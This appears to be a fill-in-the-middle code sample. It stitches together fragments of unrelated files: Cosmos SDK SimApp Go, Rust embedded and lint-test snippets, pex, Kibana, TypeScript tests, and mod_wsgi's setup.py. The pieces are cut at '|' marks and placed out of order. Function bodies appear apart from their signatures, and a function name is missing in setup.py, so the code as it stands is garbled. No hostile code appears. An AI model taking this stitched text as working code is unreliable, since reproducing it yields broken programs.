slashing.NewAppModule(appCodec, app.SlashingKeeper, app.AccountKeeper, app.BankKeeper, app.StakingKeeper),
params.NewAppModule(app.ParamsKeeper),
evidence.NewAppModule(app.EvidenceKeeper),
authzmodule.NewAppModule(appCodec, app.AuthzKeeper, app.AccountKeeper, app.BankKeeper, app.interfaceRegistry),
ibc.NewAppModule(app.IBCKeeper),
transfer.NewAppModule(app.TransferKeeper),
)
app.sm.RegisterStoreDecoders()
// initialize stores
app.MountKVStores(keys)
app.MountTransientStores(tkeys)
app.MountMemoryStores(memKeys)
// initialize BaseApp
app.SetInitChainer(app.InitChainer)
app.SetBeginBlocker(app.BeginBlocker)
anteHandler, err := NewAnteHandler(
HandlerOptions{
HandlerOptions: ante.HandlerOptions{
AccountKeeper: app.AccountKeeper,
BankKeeper: app.BankKeeper,
SignModeHandler: encodingConfig.TxConfig.SignModeHandler(),
FeegrantKeeper: app.FeeGrantKeeper,
SigGasConsumer: ante.DefaultSigVerificationGasConsumer,
},
IBCKeeper: app.IBCKeeper,
},
)
if err != nil {
panic(err)
}
app.SetAnteHandler(anteHandler)
app.SetEndBlocker(app.EndBlocker)
if loadLatest {
if err := app.LoadLatestVersion(); err != nil {
tmos.Exit(err.Error())
}
}
app.ScopedIBCKeeper = scopedIBCKeeper
app.ScopedTransferKeeper = scopedTransferKeeper
app.ScopedICAControllerKeeper = scopedICAControllerKeeper
app.ScopedICAHostKeeper = scopedICAHostKeeper
// NOTE: the IBC mock keeper and application module is used only for testing core IBC. Do
// not replicate if you do not need to test core IBC or light clients.
app.ScopedIBCMockKeeper = scopedIBCMockKeeper
app.ScopedICAMockKeeper = scopedICAMockKeeper
app.ScopedFeeMockKeeper = scopedFeeMockKeeper
return app
}
// Name returns the name of the App
func (app *SimApp) Name() string { return app.BaseApp.Name() }
// BeginBlocker application updates every begin block
func (app *SimApp) BeginBlocker(ctx sdk.Context, req abci.RequestBeginBlock) abci.ResponseBeginBlock {
return app.mm.BeginBlock(ctx, req)
}
// EndBlocker application updates every end block
func (app *SimApp) EndBlocker(ctx sdk.Context, req abci.RequestEndBlock) abci.ResponseEndBlock {
return app.mm.EndBlock(ctx, req)
}
// InitChainer application update at chain initialization
func (app *SimApp) InitChainer(ctx sdk.Context, req abci.RequestInitChain) abci.ResponseInitChain {
var genesisState GenesisState
if err := json.Unmarshal(req.AppStateBytes, &genesisState); err != nil {
panic(err)
}
app.UpgradeKeeper.SetModuleVersionMap(ctx, app.mm.GetVersionMap())
return app.mm.InitGenesis(ctx, app.appCodec, genesisState)
}
// LoadHeight loads a particular height
func (app *SimApp) LoadHeight(height int64) error {
return app.LoadVersion(height)
}
// ModuleAccountAddrs returns all the app's module account addresses.
func (app *SimApp) ModuleAccountAddrs() map[string]bool {
modAccAddrs := make(map[string]bool)
for acc := range maccPerms {
modAccAddrs[authtypes.NewModuleAddress(acc).String()] = true
}
return modAccAddrs
}
// GetModuleManager returns the app module manager
// NOTE: used for testing purposes
func (app *SimApp) GetModuleManager() *module.Manager {
return app.mm
}
// LegacyAmino returns SimApp's amino codec.
//
// NOTE: This is solely to be used for testing purposes as it may be desirable
// for modules to register their own custom testing types.
func (app *SimApp) LegacyAmino() *codec.LegacyAmino {
return app.legacyAmino
}
// AppCodec returns SimApp's app codec.
//
// NOTE: This is solely to be used for testing purposes as it may be desirable
// for modules to register their own custom testing types.
func (app *SimApp) AppCodec() codec.Codec {
return app.appCodec
}
// InterfaceRegistry returns SimApp's InterfaceRegistry
func (app *SimApp) InterfaceRegistry() types.InterfaceRegistry {
return app.interfaceRegistry
}
// GetKey returns the KVStoreKey for the provided store key.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetKey(storeKey string) *sdk.KVStoreKey {
return app.keys[storeKey]
}
// GetTKey returns the TransientStoreKey for the provided store key.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetTKey(storeKey string) *sdk.TransientStoreKey {
return app.tkeys[storeKey]
}
// GetMemKey returns the MemStoreKey for the provided mem key.
//
// NOTE: This is solely used for testing purposes.
func (app *SimApp) GetMemKey(storeKey string) *sdk.MemoryStoreKey {
return app.memKeys[storeKey]
}
// GetSubspace returns a param subspace for a given module name.
//
// NOTE: This is solely to be used for testing purposes.
func (app *SimApp) GetSubspace(moduleName string) paramstypes.Subspace {
subspace, _ := app.ParamsKeeper.GetSubspace(moduleName)
return subspace
}
// TestingApp functions
// GetBaseApp implements the TestingApp interface.
func (app *SimApp) GetBaseApp() *baseapp.BaseApp {
return app.BaseApp
}
// GetStakingKeeper implements the TestingApp interface.
func (app *SimApp) GetStakingKeeper() stakingkeeper.Keeper {
return app.StakingKeeper
}
// GetIBCKeeper implements the TestingApp interface.
func (app *SimApp) GetIBCKeeper() *ibckeeper.Keeper {
return app.IBCKeeper
}
// GetScopedIBCKeeper implements the TestingApp interface.
func (app *SimApp) GetScopedIBCKeeper() capabilitykeeper.ScopedKeeper {
return app.ScopedIBCKeeper
}
// GetTxConfig implements the TestingApp interface.
func (app *SimApp) GetTxConfig() client.TxConfig {
return MakeTestEncodingConfig().TxConfig
}
// SimulationManager implements the SimulationApp interface
func (app *SimApp) SimulationManager() *module.SimulationManager {
return app.sm
}
// RegisterAPIRoutes registers all application module routes with the provided
// API server.
func (app *SimApp) RegisterAPIRoutes(apiSvr *api.Server, apiConfig config.APIConfig) {
clientCtx := apiSvr.ClientCtx
rpc.RegisterRoutes(clientCtx, apiSvr.Router)
// Register legacy tx routes.
authrest.RegisterTxRoutes(clientCtx, apiSvr.Router)
// Register new tx routes from grpc-gateway.
authtx.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// Register new tendermint queries routes from grpc-gateway.
tmservice.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// Register legacy and grpc-gateway routes for all modules.
ModuleBasics.RegisterRESTRoutes(clientCtx, apiSvr.Router)
ModuleBasics.RegisterGRPCGatewayRoutes(clientCtx, apiSvr.GRPCGatewayRouter)
// register swagger API from root so that other applications can override easily
if apiConfig.Swagger {
RegisterSwaggerAPI(clientCtx, apiSvr.Router)
}
}
// RegisterTxService implements the Application.RegisterTxService method.
func (app *SimApp) RegisterTxService(clientCtx client.Context) {
authtx.RegisterTxService(app.BaseApp.GRPCQueryRouter(), clientCtx, app.BaseApp.Simulate, app.interfaceRegistry)
}
// RegisterTendermintService implements the Application.RegisterTendermintService method.
func (app *SimApp) RegisterTendermintService(clientCtx client.Context) {
tmservice.RegisterTendermintService(app.BaseApp.GRPCQueryRouter(), clientCtx, app.interfaceRegistry)
}
// RegisterSwaggerAPI registers swagger route with API Server
func RegisterSwaggerAPI(ctx client.Context, rtr *mux.Router)
|
// GetMaccPerms returns a copy of the module account permissions
func GetMaccPerms() map[string][]string {
dupMaccPerms := make(map[string][]string)
for k, v := range maccPerms {
dupMaccPerms[k] = v
}
return dupMaccPerms
}
// initParamsKeeper init params keeper and its subspaces
func initParamsKeeper(appCodec codec.BinaryCodec, legacyAmino *codec.LegacyAmino, key, tkey sdk.StoreKey) paramskeeper.Keeper {
paramsKeeper := paramskeeper.NewKeeper(appCodec, legacyAmino, key, tkey)
paramsKeeper.Subspace(authtypes.ModuleName)
paramsKeeper.Subspace(banktypes.ModuleName)
paramsKeeper.Subspace(stakingtypes.ModuleName)
paramsKeeper.Subspace(minttypes.ModuleName)
paramsKeeper.Subspace(distrtypes.ModuleName)
paramsKeeper.Subspace(slashingtypes.ModuleName)
paramsKeeper.Subspace(govtypes.ModuleName).WithKeyTable(govtypes.ParamKeyTable())
paramsKeeper.Subspace(crisistypes.ModuleName)
paramsKeeper.Subspace(ibctransfertypes.ModuleName)
paramsKeeper.Subspace(ibchost.ModuleName)
paramsKeeper.Subspace(icacontrollertypes.SubModuleName)
paramsKeeper.Subspace(icahosttypes.SubModuleName)
return paramsKeeper
}
|
{
statikFS, err := fs.New()
if err != nil {
panic(err)
}
staticServer := http.FileServer(statikFS)
rtr.PathPrefix("/swagger/").Handler(http.StripPrefix("/swagger/", staticServer))
}
|
example_common.rs
|
use core::sync::atomic::{AtomicUsize, Ordering};
use defmt_rtt as _;
use panic_probe as _;
defmt::timestamp! {"{=u64}", {
static COUNT: AtomicUsize = AtomicUsize::new(0);
// NOTE(no-CAS) `timestamps` runs with interrupts disabled
let n = COUNT.load(Ordering::Relaxed);
COUNT.store(n + 1, Ordering::Relaxed);
|
n as u64
}
}
|
|
lint-misplaced-attr.rs
|
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// When denying at the crate level, be sure to not get random warnings from the
// injected intrinsics by the compiler.
#![deny(attribute_usage)]
#![deny(unused_attribute)]
mod a {
#![crate_type = "bin"] //~ ERROR: crate-level attribute
//~^ ERROR: unused attribute
}
#[crate_type = "bin"] fn
|
() {} //~ ERROR: crate-level attribute
//~^ ERROR: unused attribute
|
main
|
finders.py
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import ast
import os
from pex.common import is_python_script
from pex.third_party.pkg_resources import Distribution
from pex.typing import TYPE_CHECKING, cast
if TYPE_CHECKING:
from typing import Optional
import attr # vendor:skip
else:
from pex.third_party import attr
@attr.s(frozen=True)
class DistributionScript(object):
@classmethod
def find(
cls,
dist, # type: Distribution
name, # type: str
):
# type: (...) -> Optional[DistributionScript]
script_path = os.path.join(dist.location, "bin", name)
return cls(dist=dist, path=script_path) if os.path.isfile(script_path) else None
dist = attr.ib() # type: Distribution
path = attr.ib() # type: str
def read_contents(self):
# type: () -> bytes
with open(self.path, "rb") as fp:
return fp.read()
def python_script(self):
|
try:
return cast(
ast.AST, compile(self.read_contents(), self.path, "exec", flags=0, dont_inherit=1)
)
except (SyntaxError, TypeError):
return None
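# Return the script with the given name from the first distribution that provides it, or None.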
def get_script_from_distributions(name, dists):
for dist in dists:
distribution_script = DistributionScript.find(dist, name)
if distribution_script:
return distribution_script
def get_entry_point_from_console_script(script, dists):
# Check all distributions for the console_script "script". De-dup by dist key to allow for a
# duplicate console script IFF the distribution is platform-specific and this is a multi-platform
# pex.
def get_entrypoint(dist):
script_entry = dist.get_entry_map().get("console_scripts", {}).get(script)
if script_entry is not None:
# Entry points are of the form 'foo = bar'; we just want the 'bar' part.
return str(script_entry).split("=")[1].strip()
entries = {}
for dist in dists:
entry_point = get_entrypoint(dist)
if entry_point is not None:
entries[dist.key] = (dist, entry_point)
if len(entries) > 1:
raise RuntimeError(
"Ambiguous script specification %s matches multiple entry points:\n\t%s"
% (
script,
"\n\t".join(
"%r from %r" % (entry_point, dist) for dist, entry_point in entries.values()
),
)
)
dist, entry_point = None, None
if entries:
dist, entry_point = next(iter(entries.values()))
return dist, entry_point
|
# type: () -> Optional[ast.AST]
if not is_python_script(self.path):
return None
|
legacy.ts
|
/*
* Licensed to Elasticsearch B.V. under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch B.V. licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
|
*/
import { PluginInitializerContext } from 'kibana/public';
import { npSetup, npStart } from 'ui/new_platform';
import { TagCloudPluginSetupDependencies } from './plugin';
import { plugin } from '.';
const plugins: Readonly<TagCloudPluginSetupDependencies> = {
expressions: npSetup.plugins.expressions,
visualizations: npSetup.plugins.visualizations,
charts: npSetup.plugins.charts,
};
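// Instantiate the plugin with an empty initializer context and wire its setup/start into the legacy platform.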
const pluginInstance = plugin({} as PluginInitializerContext);
export const setup = pluginInstance.setup(npSetup.core, plugins);
export const start = pluginInstance.start(npStart.core, { data: npStart.plugins.data });
|
* under the License.
|
union.Iterable.mutable.ts
|
import test from 'ava';
import { isMutable, modify } from '@collectable/core';
import { HashSetStructure, fromArray, size, union } from '../../src';
const mainValues = ['A', 'B', 'C', 'D', 'E'];
const otherValues = ['D', 'E', 'F', 'G'];
const expectedValues = ['A', 'B', 'C', 'D', 'E', 'F', 'G'];
let main: HashSetStructure<string>, result: HashSetStructure<string>;
let other: Iterable<string>;
test.before(() => {
other = new Set(otherValues).values();
main = modify(fromArray(mainValues));
result = union(other, main);
});
test('the input set is returned', t => {
t.is(result, main);
});
test('the input set is still mutable', t => {
t.true(isMutable(result));
});
test('the main set includes all items from both inputs', t => {
t.deepEqual(Array.from(result).sort(), expectedValues);
|
});
|
t.is(size(result), expectedValues.length);
|
arch_specific_libs.py
|
"""
Copyright 2017 Arm Ltd.
|
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
ARCH_SPECIFIC_LIBS = ['mkl', 'otherarch']
"""Libraries that are not available on aarch64."""
| |
setup.py
|
from __future__ import print_function
import os
import sys
import fnmatch
import subprocess
import tarfile
import shutil
import stat
import re
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
from setuptools import setup
from distutils.core import Extension
from distutils.sysconfig import get_config_var as get_python_config
from distutils.sysconfig import get_python_lib
# Before anything else, this setup.py uses some tricks to potentially
# install Apache. This can be from a local tarball, or from precompiled
# Apache binaries for Heroku and OpenShift environments downloaded from
# Amazon S3. Once they are installed, then the installation of the
# mod_wsgi package itself will be triggered, ensuring that it can be
# built against the precompiled Apache binaries which were installed.
#
# First work out whether we are actually running on either Heroku or
# OpenShift. If we are, then we identify the set of precompiled binaries
# we are to use and copy it into the Python installation.
PREFIX = 'https://s3.amazonaws.com'
BUCKET = os.environ.get('MOD_WSGI_REMOTE_S3_BUCKET_NAME', 'modwsgi.org')
REMOTE_TARBALL_NAME = os.environ.get('MOD_WSGI_REMOTE_PACKAGES_NAME')
LOCAL_TARBALL_FILE = os.environ.get('MOD_WSGI_LOCAL_PACKAGES_FILE')
TGZ_OPENSHIFT='mod_wsgi-packages-openshift-centos6-apache-2.4.12-1.tar.gz'
TGZ_HEROKU='mod_wsgi-packages-heroku-cedar14-apache-2.4.12-1.tar.gz'
if not REMOTE_TARBALL_NAME and not LOCAL_TARBALL_FILE:
if os.environ.get('OPENSHIFT_HOMEDIR'):
REMOTE_TARBALL_NAME = TGZ_OPENSHIFT
elif os.path.isdir('/app/.heroku'):
REMOTE_TARBALL_NAME = TGZ_HEROKU
REMOTE_TARBALL_URL = None
if LOCAL_TARBALL_FILE is None and REMOTE_TARBALL_NAME:
REMOTE_TARBALL_URL = '%s/%s/%s' % (PREFIX, BUCKET, REMOTE_TARBALL_NAME)
WITH_TARBALL_PACKAGE = False
if REMOTE_TARBALL_URL or LOCAL_TARBALL_FILE:
WITH_TARBALL_PACKAGE = True
# If we are doing an install, download the tarball and unpack it into
# the 'packages' subdirectory. We will then add everything in that
# directory as package data so that it will be installed into the Python
# installation.
if WITH_TARBALL_PACKAGE:
if REMOTE_TARBALL_URL:
if not os.path.isfile(REMOTE_TARBALL_NAME):
print('Downloading', REMOTE_TARBALL_URL)
urlretrieve(REMOTE_TARBALL_URL, REMOTE_TARBALL_NAME+'.download')
os.rename(REMOTE_TARBALL_NAME+'.download', REMOTE_TARBALL_NAME)
LOCAL_TARBALL_FILE = REMOTE_TARBALL_NAME
if LOCAL_TARBALL_FILE:
shutil.rmtree('src/packages', ignore_errors=True)
tar = tarfile.open(LOCAL_TARBALL_FILE)
tar.extractall('src/packages')
tar.close()
open('src/packages/__init__.py', 'a').close()
package_files = []
for root, dirs, files in os.walk('src/packages', topdown=False):
for name in files:
path = os.path.join(root, name).split('/', 1)[1]
package_files.append(path)
print('adding ', path)
print('Running setup for Apache')
setup(name = 'mod_wsgi-packages',
version = '1.0.0',
packages = ['mod_wsgi', 'mod_wsgi.packages'],
package_dir = {'mod_wsgi': 'src'},
package_data = {'mod_wsgi': package_files},
)
# From this point on we will now actually install mod_wsgi. First we need
# to work out what all the available source code files are that should be
# compiled.
source_files = [os.path.join('src/server', name) for name in
os.listdir(os.path.join(os.path.dirname(os.path.abspath(__file__)),
'src/server')) if fnmatch.fnmatch(name, '*.c')]
# Work out all the Apache specific compilation flags. This is done using
# the standard Apache apxs command unless we are installing our own build
# of Apache. In that case we use Python code to do the equivalent of apxs
# as apxs will not work due to paths not matching where it was installed.
def
|
(names, default=None, paths=[]):
for name in names:
for path in os.environ['PATH'].split(':') + paths:
program = os.path.join(path, name)
if os.path.exists(program):
return program
return default
APXS = os.environ.get('APXS')
WITH_HTTPD_PACKAGE = False
if APXS is None:
APXS = find_program(['mod_wsgi-apxs'],
paths=[os.path.dirname(sys.executable)])
if APXS is not None:
WITH_HTTPD_PACKAGE = True
if APXS is None:
APXS = find_program(['mod_wsgi-apxs', 'apxs2', 'apxs'],
'apxs', ['/usr/sbin', os.getcwd()])
elif not os.path.isabs(APXS):
APXS = find_program([APXS], APXS, ['/usr/sbin', os.getcwd()])
WITHOUT_APXS = False
WITH_WINDOWS_APACHE = None
WITH_MACOSX_APACHE = None
if not WITH_TARBALL_PACKAGE:
if not os.path.isabs(APXS) or not os.access(APXS, os.X_OK):
WITHOUT_APXS = True
if WITHOUT_APXS and os.name == 'nt':
APACHE_ROOTDIR = os.environ.get('MOD_WSGI_APACHE_ROOTDIR')
if APACHE_ROOTDIR:
if os.path.exists(APACHE_ROOTDIR):
WITH_WINDOWS_APACHE = APACHE_ROOTDIR
else:
raise RuntimeError('The Apache directory %r does not exist.' %
APACHE_ROOTDIR)
else:
if os.path.exists('c:\\Apache24'):
WITH_WINDOWS_APACHE = 'c:\\Apache24'
elif os.path.exists('c:\\Apache22'):
WITH_WINDOWS_APACHE = 'c:\\Apache22'
elif os.path.exists('c:\\Apache2'):
WITH_WINDOWS_APACHE = 'c:\\Apache2'
else:
raise RuntimeError('No Apache installation can be found. Set the '
'MOD_WSGI_APACHE_ROOTDIR environment to its location.')
elif WITHOUT_APXS and sys.platform == 'darwin':
WITH_MACOSX_APACHE = '/Applications/Xcode.app'
if WITHOUT_APXS and not WITH_WINDOWS_APACHE and not WITH_MACOSX_APACHE:
raise RuntimeError('The %r command appears not to be installed or '
'is not executable. Please check the list of prerequisites '
'in the documentation for this package and install any '
'missing Apache httpd server packages.' % APXS)
if WITH_WINDOWS_APACHE:
def get_apxs_config(name):
if name == 'INCLUDEDIR':
return WITH_WINDOWS_APACHE + '/include'
elif name == 'LIBEXECDIR':
return WITH_WINDOWS_APACHE + '/lib'
else:
return ''
def get_apr_includes():
return ''
def get_apu_includes():
return ''
elif WITH_MACOSX_APACHE:
def get_apxs_config(name):
if name == 'BINDIR':
return '/usr/bin'
elif name == 'SBINDIR':
return '/usr/sbin'
elif name == 'LIBEXECDIR':
return '/usr/libexec/apache2'
elif name == 'PROGNAME':
return 'httpd'
elif name == 'SHLIBPATH_VAR':
return 'DYLD_LIBRARY_PATH'
else:
return ''
def get_apr_includes():
return ''
def get_apu_includes():
return ''
elif WITH_TARBALL_PACKAGE:
SCRIPT_DIR = os.path.join(os.path.dirname(__file__), 'src', 'packages')
CONFIG_FILE = os.path.join(SCRIPT_DIR, 'apache/build/config_vars.mk')
CONFIG = {}
with open(CONFIG_FILE) as fp:
for line in fp.readlines():
name, value = line.split('=', 1)
name = name.strip()
value = value.strip()
CONFIG[name] = value
_varprog = re.compile(r'\$(\w+|(?:\{[^}]*\}|\([^)]*\)))')
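# Expand $NAME, ${NAME} and $(NAME) references in a value using entries from CONFIG.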
def expand_vars(value):
if '$' not in value:
return value
i = 0
while True:
m = _varprog.search(value, i)
if not m:
break
i, j = m.span(0)
name = m.group(1)
if name.startswith('{') and name.endswith('}'):
name = name[1:-1]
elif name.startswith('(') and name.endswith(')'):
name = name[1:-1]
if name in CONFIG:
tail = value[j:]
value = value[:i] + CONFIG.get(name, '')
i = len(value)
value += tail
else:
i = j
return value
def get_apxs_config(name):
value = CONFIG.get(name, '')
sub_value = expand_vars(value)
while value != sub_value:
value = sub_value
sub_value = expand_vars(value)
return sub_value.replace('/mod_wsgi-packages/', SCRIPT_DIR+'/')
def get_apr_includes():
return ''
def get_apu_includes():
return ''
CONFIG['PREFIX'] = get_apxs_config('prefix')
CONFIG['TARGET'] = get_apxs_config('target')
CONFIG['SYSCONFDIR'] = get_apxs_config('sysconfdir')
CONFIG['INCLUDEDIR'] = get_apxs_config('includedir')
CONFIG['LIBEXECDIR'] = get_apxs_config('libexecdir')
CONFIG['BINDIR'] = get_apxs_config('bindir')
CONFIG['SBINDIR'] = get_apxs_config('sbindir')
CONFIG['PROGNAME'] = get_apxs_config('progname')
else:
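# Query the apxs tool directly: 'apxs -q NAME' prints the value of an Apache build variable.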
def get_apxs_config(query):
p = subprocess.Popen([APXS, '-q', query],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
def get_apr_includes():
if not APR_CONFIG:
return ''
p = subprocess.Popen([APR_CONFIG, '--includes'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
def get_apu_includes():
if not APU_CONFIG:
return ''
p = subprocess.Popen([APU_CONFIG, '--includes'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if isinstance(out, bytes):
out = out.decode('UTF-8')
return out.strip()
INCLUDEDIR = get_apxs_config('INCLUDEDIR')
CPPFLAGS = get_apxs_config('CPPFLAGS').split()
CFLAGS = get_apxs_config('CFLAGS').split()
EXTRA_INCLUDES = get_apxs_config('EXTRA_INCLUDES').split()
EXTRA_CPPFLAGS = get_apxs_config('EXTRA_CPPFLAGS').split()
EXTRA_CFLAGS = get_apxs_config('EXTRA_CFLAGS').split()
APR_CONFIG = get_apxs_config('APR_CONFIG')
APU_CONFIG = get_apxs_config('APU_CONFIG')
# Make sure that 'apr-1-config' exists. If it doesn't we may be running
# on MacOS X Sierra, which has decided to not provide either it or the
# 'apu-1-config' script and an otherwise completely broken 'apxs'. In that
# case we manually set the locations of the Apache and APR header files.
if (not os.path.exists(APR_CONFIG) and
os.path.exists('/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk')):
INCLUDEDIR = '/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/apache2'
APR_INCLUDES = ['-I/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/usr/include/apr-1']
APU_INCLUDES = []
elif (not os.path.exists(APR_CONFIG) and
os.path.exists('/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk')):
INCLUDEDIR = '/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk/usr/include/apache2'
APR_INCLUDES = ['-I/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/swift-migrator/sdks/MacOSX.sdk/usr/include/apr-1']
APU_INCLUDES = []
else:
APR_INCLUDES = get_apr_includes().split()
APU_INCLUDES = get_apu_includes().split()
if not os.path.exists(APR_CONFIG) and not INCLUDEDIR:
if sys.platform == 'darwin':
# Likely no Xcode application installed or location of SDK in
# Xcode has changed with a new release of Xcode application.
raise RuntimeError('No Apache installation can be found. Do you '
'have the full Apple Xcode installed? It is not enough to '
'have just the Xcode command line tools installed.')
else:
# Set INCLUDEDIR just to avoid having an empty path. Probably
# should raise an exception here.
INCLUDEDIR = '/usr/include'
# Write out apxs_config.py which caches various configuration related to
# Apache. For the case of using our own Apache build, this needs to
# calculate values dynamically based on where binaries were installed.
# This is necessary as on OpenShift the virtual environment gets copied
# for each gear to a different path. We can't therefore rely on a hard
# coded path.
BINDIR = get_apxs_config('BINDIR')
SBINDIR = get_apxs_config('SBINDIR')
PROGNAME = get_apxs_config('PROGNAME')
MPM_NAME = get_apxs_config('MPM_NAME')
LIBEXECDIR = get_apxs_config('LIBEXECDIR')
SHLIBPATH_VAR = get_apxs_config('SHLIBPATH_VAR')
APXS_CONFIG_TEMPLATE = """
import os
WITH_TARBALL_PACKAGE = %(WITH_TARBALL_PACKAGE)r
WITH_HTTPD_PACKAGE = %(WITH_HTTPD_PACKAGE)r
if WITH_HTTPD_PACKAGE:
from mod_wsgi_packages.httpd import __file__ as PACKAGES_ROOTDIR
PACKAGES_ROOTDIR = os.path.dirname(PACKAGES_ROOTDIR)
BINDIR = os.path.join(PACKAGES_ROOTDIR, 'bin')
SBINDIR = BINDIR
LIBEXECDIR = os.path.join(PACKAGES_ROOTDIR, 'modules')
SHLIBPATH = os.path.join(PACKAGES_ROOTDIR, 'lib')
elif WITH_TARBALL_PACKAGE:
from mod_wsgi.packages import __file__ as PACKAGES_ROOTDIR
PACKAGES_ROOTDIR = os.path.dirname(PACKAGES_ROOTDIR)
BINDIR = os.path.join(PACKAGES_ROOTDIR, 'apache', 'bin')
SBINDIR = BINDIR
LIBEXECDIR = os.path.join(PACKAGES_ROOTDIR, 'apache', 'modules')
SHLIBPATH = []
SHLIBPATH.append(os.path.join(PACKAGES_ROOTDIR, 'apr-util', 'lib'))
SHLIBPATH.append(os.path.join(PACKAGES_ROOTDIR, 'apr', 'lib'))
SHLIBPATH = ':'.join(SHLIBPATH)
else:
BINDIR = '%(BINDIR)s'
SBINDIR = '%(SBINDIR)s'
LIBEXECDIR = '%(LIBEXECDIR)s'
SHLIBPATH = ''
MPM_NAME = '%(MPM_NAME)s'
PROGNAME = '%(PROGNAME)s'
SHLIBPATH_VAR = '%(SHLIBPATH_VAR)s'
if os.path.exists(os.path.join(SBINDIR, PROGNAME)):
HTTPD = os.path.join(SBINDIR, PROGNAME)
elif os.path.exists(os.path.join(BINDIR, PROGNAME)):
HTTPD = os.path.join(BINDIR, PROGNAME)
else:
HTTPD = PROGNAME
if os.path.exists(os.path.join(SBINDIR, 'rotatelogs')):
ROTATELOGS = os.path.join(SBINDIR, 'rotatelogs')
elif os.path.exists(os.path.join(BINDIR, 'rotatelogs')):
ROTATELOGS = os.path.join(BINDIR, 'rotatelogs')
else:
ROTATELOGS = 'rotatelogs'
"""
with open(os.path.join(os.path.dirname(__file__),
'src/server/apxs_config.py'), 'w') as fp:
print(APXS_CONFIG_TEMPLATE % dict(
WITH_TARBALL_PACKAGE=WITH_TARBALL_PACKAGE,
WITH_HTTPD_PACKAGE=WITH_HTTPD_PACKAGE,
BINDIR=BINDIR, SBINDIR=SBINDIR, LIBEXECDIR=LIBEXECDIR,
MPM_NAME=MPM_NAME, PROGNAME=PROGNAME,
SHLIBPATH_VAR=SHLIBPATH_VAR), file=fp)
# Work out location of Python library and how to link it.
PYTHON_VERSION = get_python_config('VERSION')
if os.name == 'nt':
if hasattr(sys, 'real_prefix'):
PYTHON_LIBDIR = sys.real_prefix
else:
PYTHON_LIBDIR = get_python_config('BINDIR')
PYTHON_LDFLAGS = []
PYTHON_LDLIBS = ['%s/libs/python%s.lib' % (PYTHON_LIBDIR, PYTHON_VERSION),
'%s/lib/libhttpd.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libapr-1.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libaprutil-1.lib' % WITH_WINDOWS_APACHE,
'%s/lib/libapriconv-1.lib' % WITH_WINDOWS_APACHE]
else:
PYTHON_LDVERSION = get_python_config('LDVERSION') or PYTHON_VERSION
PYTHON_LIBDIR = get_python_config('LIBDIR')
PYTHON_CFGDIR = get_python_lib(plat_specific=1, standard_lib=1) + '/config'
if PYTHON_LDVERSION and PYTHON_LDVERSION != PYTHON_VERSION:
PYTHON_CFGDIR = '%s-%s' % (PYTHON_CFGDIR, PYTHON_LDVERSION)
if not os.path.exists(PYTHON_CFGDIR):
PYTHON_CFGDIR = '%s-%s' % (PYTHON_CFGDIR, sys.platform)
PYTHON_LDFLAGS = ['-L%s' % PYTHON_LIBDIR, '-L%s' % PYTHON_CFGDIR]
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_LDVERSION]
if os.path.exists(os.path.join(PYTHON_LIBDIR,
'libpython%s.a' % PYTHON_VERSION)):
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_VERSION]
if os.path.exists(os.path.join(PYTHON_CFGDIR,
'libpython%s.a' % PYTHON_VERSION)):
PYTHON_LDLIBS = ['-lpython%s' % PYTHON_VERSION]
# Create the final set of compilation flags to be used.
INCLUDE_DIRS = [INCLUDEDIR]
EXTRA_COMPILE_FLAGS = (EXTRA_INCLUDES + CPPFLAGS + EXTRA_CPPFLAGS +
CFLAGS + EXTRA_CFLAGS + APR_INCLUDES + APU_INCLUDES)
EXTRA_LINK_ARGS = PYTHON_LDFLAGS + PYTHON_LDLIBS
# Force adding of LD_RUN_PATH for platforms that may need it.
if os.name != 'nt':
LD_RUN_PATH = os.environ.get('LD_RUN_PATH', '')
